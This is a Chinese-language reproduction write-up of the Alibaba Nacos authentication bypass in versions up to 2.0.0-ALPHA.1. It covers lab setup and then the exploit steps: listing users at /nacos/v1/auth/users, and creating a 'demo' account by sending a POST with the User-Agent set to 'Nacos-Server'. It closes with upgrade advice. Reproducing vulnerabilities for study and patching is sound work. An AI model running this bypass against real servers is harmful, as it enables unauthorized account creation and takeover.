Alibaba Nacos权限认证绕过漏洞复现

0x0****0****简介

Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。

Alibaba Nacos权限认证绕过漏洞复现

0x01漏洞概述

Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的认证绕过漏洞。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。

0x02影响版本

Nacos <= 2.0.0-ALPHA.1

0x03环境搭建

1、在Nacos的GitHub项目地址下载nacos2.0.0-ALPHA.1版本的,下载地址:

wget https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1

Alibaba Nacos权限认证绕过漏洞复现

2.解压下载的安装,进入bin目录运行启动 //启动需要java8环境

tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz cd nacos/bin ./startup.sh -m standalone

Alibaba Nacos权限认证绕过漏洞复现

3、在浏览访问http://your-ip:8488/nacos,搭建成功 //默认账号密码为:nacos/nacos

Alibaba Nacos权限认证绕过漏洞复现

0x04漏洞复现

1、在url处添加访问一下网址即可查看到用户列表

/nacos/v1/auth/users?pageNo=1&pageSize=100

Alibaba Nacos权限认证绕过漏洞复现

2、访问以下链接并使用burp抓包,然后把get请求改为post,把修改User-Agent头改为Nacos-Server

http://your-ip:8848/nacos/v1/auth/users

Alibaba Nacos权限认证绕过漏洞复现

3、构造数据包添加一个demo用户,然后发送POST请求,返回为200,表示创建用户成功

username=demo&password=demo

Alibaba Nacos权限认证绕过漏洞复现

4、回到登录界面,使用添加的账号密码进行登录,可以看到登录成功

Alibaba Nacos权限认证绕过漏洞复现

0x05修复建议

1、官方已发布安全版本,建议下载或升级至最新版本

你可能感兴趣的:(Alibaba Nacos权限认证绕过漏洞复现)